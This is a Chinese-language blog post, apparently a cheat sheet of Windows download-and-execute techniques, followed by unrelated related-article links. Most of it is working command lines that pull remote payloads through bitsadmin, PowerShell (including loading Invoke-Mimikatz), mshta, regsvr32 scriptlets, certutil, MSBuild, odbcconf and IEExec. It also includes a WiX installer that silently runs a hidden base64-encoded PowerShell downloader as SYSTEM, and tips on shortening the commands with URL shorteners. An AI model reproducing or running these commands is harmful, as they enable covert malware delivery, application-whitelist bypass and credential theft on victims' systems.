1.bitsadmin命令(只能命令下载到指定路径上,win7以上):

  1. bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
  1. bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe

2.powershell命名下载执行:(win7以上)

  1. powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
  2.  
  3. powershell -exec bypass -f \\webdavserver\folder\payload.ps1
  4.  
  5. powershell (new-object System.Net.WebClient).DownloadFile( http://192.168.168.183/1.exe’,’C:\111111111111111.exe’)
  6.  
  7. powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')

3.mshta命令下载执行

  1. mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
  2.  
  3. mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8
  4.  
  5. mshta \\webdavserver\folder\payload.hta

payload.hta

  1. <HTML>
  2.  
  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  4.  
  5. <HEAD>
  6.  
  7. <script language="VBScript">
  8.  
  9. Window.ReSizeTo , 
  10.  
  11. Window.moveTo -,-
  12.  
  13. Set objShell = CreateObject("Wscript.Shell")
  14.  
  15. objShell.Run "calc.exe"
  16.  
  17. self.close
  18.  
  19. </script>
  20.  
  21. <body>
  22.  
  23. demo
  24.  
  25. </body>
  26.  
  27. </HEAD>
  28.  
  29. </HTML>

4.rundll32命令下载执行

  1. rundll32 \\webdavserver\folder\payload.dll,entrypoint
  2.  
  3. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

参考:https://github.com/3gstudent/Javascript-Backdoor

5.net中的regasm命令下载执行

  1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

6.cmd的远程命令下载:

  1. cmd.exe /k < \\webdavserver\folder\batchfile.txt

7.regsvr32命令下载执行

  1. regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
  2. regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
  3. regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

js.png

  1. <?XML version="1.0"?>
  2.  
  3. <scriptlet>
  4.  
  5. <registration
  6.  
  7.     progid="ShortJSRAT"
  8.  
  9.     classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
  10.  
  11.     <!-- Learn from Casey Smith @subTee -->
  12.  
  13.     <script language="JScript">
  14.  
  15.         <![CDATA[
  16.  
  17.             ps  = "cmd.exe /c calc.exe";
  18.  
  19.             new ActiveXObject("WScript.Shell").Run(ps,,true);
  20.  
  21.         ]]>
  22.  
  23. </script>
  24.  
  25. </registration>
  26.  
  27. </scriptlet>

8.certutil命令下载执行

  1. certutil -urlcache -split -f http://webserver/payload payload
  2.  
  3. certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
  4.  
  5. certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
  6.  
  7. certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

9.net中的MSBulid命令下载执行

  1. cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

10. odbcconf命令下载执行

  1. odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

11.cscript脚本远程命令下载执行

  1. cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct
  2.  
  3. cscript //E:jscript \\webdavserver\folder\payload.txt

downfile.vbs:

  1. ' Set your settings
  2.  
  3. strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
  4.  
  5. strHDLocation = "c:\logo.jpg"
  6.  
  7. ' Fetch the file
  8.  
  9. Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
  10.  
  11. objXMLHTTP.open "GET", strFileURL, false
  12.  
  13. objXMLHTTP.send()
  14.  
  15. If objXMLHTTP.Status =  Then
  16.  
  17. Set objADOStream = CreateObject("ADODB.Stream")
  18.  
  19. objADOStream.Open
  20.  
  21. objADOStream.Type =  'adTypeBinary
  22.  
  23. objADOStream.Write objXMLHTTP.ResponseBody
  24.  
  25. objADOStream.Position = 'Set the stream position to the start
  26.  
  27. Set objFSO = Createobject("Scripting.FileSystemObject")
  28.  
  29. If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
  30.  
  31. Set objFSO = Nothing
  32.  
  33. objADOStream.SaveToFile strHDLocation
  34.  
  35. objADOStream.Close
  36.  
  37. Set objADOStream = Nothing
  38.  
  39. End if
  40.  
  41. Set objXMLHTTP = Nothing

将以上保存为downfile.vbs

输入命令:cscript  downfile.vbs

12.pubprn.vbs下载执行命令

  1. cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1  script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

13.windows自带命令copy

  1. copy \\x.x.x.x\xx\poc.exe
  2.  
  3. xcopy d:\test.exe  \\x.x.x.x\test.exe

14. IEXPLORE.EXE命令下载执行(需要IE存在oday)

  1. "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp

15.IEEXC命令下载执行

  1. C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
  2.  
  3. C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe

参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

16. msiexec命令下载执行

  1. msiexec /q /i http://site.com/payloads/calc.png

该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述

首先将powershell实现下载执行的代码作base64编码:

  1. $fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe'"
  2. $bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
  3. $encoded = [System.Convert]::ToBase64String($bytes);
  4. $encoded

得到:

  1. KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

完整powershell命令为:

  1. powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

完整wix文件为:

  1. <?xml version="1.0"?>
  2. <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  3.   <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product
  4. Name" Version="0.0." Manufacturer="@_xpn_" Language="">
  5.     <Package InstallerVersion="" Compressed="yes" Comments="Windows Installer Package"/>
  6.     <Media Id="" />
  7.     <Directory Id="TARGETDIR" Name="SourceDir">
  8.       <Directory Id="ProgramFilesFolder">
  9.         <Directory Id="INSTALLLOCATION" Name="Example">
  10.           <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
  11.           </Component>
  12.         </Directory>
  13.       </Directory>
  14.     </Directory>
  15.     <Feature Id="DefaultFeature" Level="">
  16.       <ComponentRef Id="ApplicationFiles"/>
  17.     </Feature>
  18.     <Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
  19.     </Property>
  20.     <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"
  21. ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
  22.     <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  23.       invalid vbs to fail install
  24.     </CustomAction>
  25.     <InstallExecuteSequence>
  26.       <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  27.       <Custom Action="FailInstall" Before="InstallFiles"></Custom>
  28.     </InstallExecuteSequence>
  29.   </Product>
  30. </Wix>

将其编译,生成msi文件,命令如下:

  1. candle.exe msigen.wix
  2.  
  3. light.exe msigen.wixobj

生成test.msi

实现功能:

  1. msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi

注:

执行后需要手动结束进程msiexec.exe

结合百度提供的短地址服务(http://dwz.cn/), 实现代码为34个字符,代码如下:

  1. msiexec /q /i http://dwz.cn/6UJpF8

17.下载命令执行项目GreatSCT

https://github.com/GreatSCT/

windows下载执行命令大全的更多相关文章

  1. Windows:FTP命令大全

    Windows:FTP命令大全 简介 1, open:与服务器相连接: 2, send(put):上传文件: 3,get:下载文件: 4,mget:下载多个文件: 用法: mget *:下载当前路径下 ...

  2. Windows常用shell命令大全

    Windows常用shell命令大全 基于鼠标操作的后果就是OS界面外观发生改变, 就得多花学习成本.更主要的是基于界面引导Path与命令行直达速度是难以比拟的.另外Geek很大一部分是键盘控,而非鼠 ...

  3. Windows常用shell命令大全(转)

    [Windows常用shell命令大全] 基于鼠标操作的后果就是OS界面外观发生改变, 就得多花学习成本.更主要的是基于界面引导Path与命令行直达速度是难以比拟的.另外Geek很大一部分是键盘控,而 ...

  4. Windows 7运行命令大全

    Windows 7运行命令大全,小编整理了常用的45个Win7运行命令分享给大家:1.cleanmgr:打开磁盘清理工具 2.compmgmt.msc:计算机管理 3.conf:启动系统配置实用程序 ...

  5. Windows下载 Curl 命令

    Windows下载 Curl 命令 描述: 不仅Linux命令行可以使用curl命令下载软件, Windows系统的cmd命令窗口也可以使用curl命令下载,并且更稳定. 原文作者:Wayne Zhu ...

  6. python paramiko实现ssh上传下载执行命令

    paramiko ssh上传下载执行命令 序言 最近项目经常需要动态在跳板机上登录服务器进行部署环境,且服务器比较多,每次完成所有服务器到环境部署执行耗费大量时间.为了解决这个问题,根据所学的执行实现 ...

  7. Windows CMD常用命令大全 运行命令

    http://blog.163.com/lixunhuan@126/blog/static/122060620075124142658/ CMD命令大全 net use \\ip\ipc$ " ...

  8. FW Windows下DOS命令大全(经典收藏)---mklink

    dos command port-->PID: netstat -ano | findstr port | tasklist |findstr "" Windows SYST ...

  9. Windows 经典DOS命令大全

    copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或 ...

随机推荐

  1. 现有新的iOS更新可用,请从iOS12 beta版进行更新.解决方案

    问题描述: ios系统一直弹出“现有新的iOS更新可用,请从iOS12 beta版进行更新”的提示,很烦的. 应该只出现在安装测试版ios12的手机上. 解决方案: 删除描述文件无法解决. 有网友机制 ...

  2. springmvc传参---LocalDateTime、Date等时间类型转换

    此处定义的dateConvert用来转换Date类型,如果是LocalDate.LocalDateTime类型,则将Date类型换成相应的类型即可,注意java8的日期类型需要用Formatter格式 ...

  3. Jenkins Git安装设置

    Jenkins Git安装设置 在此安装中,必须确保Internet连接可连接其安装 Jenkins 机器.在 Jenkins 仪表盘(主屏幕)的左侧单击 Manage Jenkins 选项.打开网址 ...

  4. TPO 03 - Architecture

    TPO 03 - Architecture Architecture is the art and science of designing structures that[主语是Architectu ...

  5. VR电竞游戏在英特尔®架构上的用户体验优化

    作为人与虚拟世界之间的新型交互方式,VR 能够让用户在模拟现实中获得身临其境的感受.但是,鉴于 VR 的帧预算为每帧 11.1ms (90fps),实现实时渲染并不容易,需要对整个场景渲染两次(一只眼 ...

  6. 《图解 HTTP 》阅读 —— 第三章

    第3章 HTTP 报文内的 HTTP 信息 用于 HTTP 协议交互的信息称为 HTTP 报文:请求报文和响应报文 HTTP 在传输数据时通过编码可以提升速率,能有效的处理大量数据,但是会消耗更多的C ...

  7. mysql5.5 升级到 5.7 的坑

    1.大概思路,docker 新启一个mysql5.7 端口映射到3307 2. 导出5.5 的.sql文件,导入5.7中 3.测试通过后,可将5.5关闭.5.7端口改回3306 GRANT ALL P ...

  8. 分布式数据库中间件Mycat百亿级数据存储(转)

    此文转自: https://www.jianshu.com/p/9f1347ef75dd 2013年阿里的Cobar在社区使用过程中发现存在一些比较严重的问题,如高并发下的假死,心跳连接的故障,只实现 ...

  9. call appiy

    其实就是动态的改变this了,下面例子就说明了... function add(a, b){ console.dir(this); } function sub(a, b){ console.dir( ...

  10. sprint3最终演示及团队贡献分

    团队名:在考虑 团队项目:复利计算 项目演示: 之前的功能都有演示过就不再一一截图,把我们新增加的功能说一下 首先用户进入我们的网页可以登录或者注册,注册的用户可以直接输入用户名及密码登录,没有注册的 ...